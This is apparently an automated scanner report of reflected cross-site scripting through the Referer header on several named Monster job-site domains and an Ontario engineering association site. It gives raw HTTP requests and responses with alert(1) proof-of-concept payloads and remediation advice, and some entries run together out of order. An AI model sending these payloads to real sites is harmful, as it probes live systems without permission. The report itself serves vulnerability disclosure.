HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:39 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=rfw0ev55xkqwpjv3wvf21g45; path=/; HttpOnly Set-Cookie: split_scsjsv=96; domain=.monster.fr; expires=Sat, 26-Nov-2011 19:49:39 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.fr; path=/ Set-Cookie: split_ssljsv=96; domain=.monster.fr; expires=Sat, 26-Nov-2011 19:49:39 GMT; path=/ Set-Cookie: ssljsv=0; domain=.monster.fr; path=/ Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:39 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:39 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 260041 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22ff3'-alert(1)-'c8ff076af8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: praca.monsterpolska.pl Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=22ff3'-alert(1)-'c8ff076af8
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:46 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lre2n5fz5uz5qv45ufk5tvvr; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:46 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:46 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 379132 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98bc0'-alert(1)-'d81f1adf412 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: rabota.monsterrussia.ru Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=98bc0'-alert(1)-'d81f1adf412
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:49:44 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=gzvtxi45q31bcpa0z2exo145; path=/; HttpOnly Set-Cookie: webtrends_Profile=true; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:44 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:44 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 226701 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 717c4'-alert(1)-'39a8c5280db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Search.aspx HTTP/1.1 Host: recherche.monster.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=717c4'-alert(1)-'39a8c5280db
Response
HTTP/1.1 200 OK Date: Fri, 26 Nov 2010 19:45:48 GMT Server: Microsoft-IIS/6.0 P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mj4rh055jmncxpreg51kbt45; path=/; HttpOnly Set-Cookie: split_scsjsv=30; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:45:47 GMT; path=/ Set-Cookie: scsjsv=0; domain=.monster.ca; path=/ Set-Cookie: JSRTimeStamp=634263795480019139; domain=.monster.ca; path=/ Set-Cookie: NumberOfJSR=1; domain=.monster.ca; path=/ Set-Cookie: BackToJSRLink=&referrer=search.aspx; domain=.monster.ca; path=/ Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:45:48 GMT; path=/ Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:45:48 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 721570 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 62e7d><script>alert(1)</script>c4421c022f6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /newsinfo/newsinfo.asp HTTP/1.1 Host: www.ceo.on.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDQSQQRBCA=LNJPLLEDAEFAAJMKLEOBBDKP; Referer: http://www.google.com/search?hl=en&q=62e7d><script>alert(1)</script>c4421c022f6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 25141 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 19:49:51 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CEO - Consulting Engineers of Ontario</title> <META NAME="description" content="CEO - Consulting Engineers ...[SNIP]... <a href=http://www.google.com/search?hl=en&q=62e7d><script>alert(1)</script>c4421c022f6> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2e62a><script>alert(1)</script>7c0e996df4c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe.asp HTTP/1.1 Host: www.ceo.on.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ASPSESSIONIDQSQQRBCA=LNJPLLEDAEFAAJMKLEOBBDKP; Referer: http://www.google.com/search?hl=en&q=2e62a><script>alert(1)</script>7c0e996df4c
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21212 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Fri, 26 Nov 2010 19:52:10 GMT Connection: close